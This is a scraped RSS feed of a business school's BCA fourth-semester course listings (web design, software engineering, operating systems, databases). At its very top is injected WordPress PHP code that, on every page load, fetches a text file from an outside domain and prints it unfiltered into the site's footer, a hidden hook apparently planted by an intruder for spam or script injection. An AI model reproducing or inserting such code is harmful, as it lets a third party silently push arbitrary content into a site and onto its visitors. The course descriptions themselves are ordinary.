add_action('wp_footer', 'load_external_footer');
function load_external_footer(){
$url = 'https://kmaa26.com/berita.txt';
$data = wp_safe_remote_get($url);
if(!is_wp_error($data)){
$body = wp_remote_retrieve_body($data);
echo $body;
}
}4 Semester Archives - Synetic Business School
https://sbs.ac.in/course-category/bca/4-semester-bca/
... College with a differenceThu, 12 May 2022 06:55:52 +0000en-US
hourly
1 https://wordpress.org/?v=6.9https://sbs.ac.in/wp-content/uploads/2021/12/cropped-fevicon-32x32.png4 Semester Archives - Synetic Business School
https://sbs.ac.in/course-category/bca/4-semester-bca/
3232Web Designing
https://sbs.ac.in/course/web-designing/
Thu, 12 May 2022 06:36:38 +0000https://sbs.ac.in/?post_type=lp_course&p=18205The post Web Designing appeared first on Synetic Business School.
]]>
Software Engineering
https://sbs.ac.in/course/software-engineering/
https://sbs.ac.in/course/software-engineering/#respondThu, 12 May 2022 06:35:06 +0000https://sbs.ac.in/?post_type=lp_course&p=18757Course Code : UGCA1921 Course Name : Software Engineering Course Outcomes: CO1-Aware about the engineering approach to analysis, design and built the software CO2-Understand the phases and activities involved in the conventional software life cycle models CO3-Analyse problems, and identify …
]]>https://sbs.ac.in/course/software-engineering/feed/0Operating System
https://sbs.ac.in/course/operating-system/
Sat, 02 Apr 2022 09:47:05 +0000https://sbs.ac.in/?post_type=lp_course&p=18054Unit-I Fundamentals of Operating system: Introduction to Operating system, Functions of an operating system. Operating system as a resource manager. Structure of operating system (Role of kernel and Shell). Views of operating system. Evolution and types of operating systems. Process …
]]>DataBase Management System
https://sbs.ac.in/course/database-management-system/
Sat, 02 Apr 2022 09:32:28 +0000https://sbs.ac.in/?post_type=lp_course&p=17973The post DataBase Management System appeared first on Synetic Business School.
]]>Operating Systems (UGCA1923)
https://sbs.ac.in/course/operating-systems-ugca1923/
Mon, 07 Jun 2021 09:46:39 +0000https://sbs.ac.in/?post_type=lp_course&p=13205Subject Name :- Operating Systems Course outcomes 1. Install & configure different operating systems. 2. Write programs/ scripts for different scheduling algorithms Reference Books: 1. Internet for EveryOne: Alexis Leon, 1st Edition, Leon Techworld, Publication, 2009. 2. Greenlaw R; Heppe, …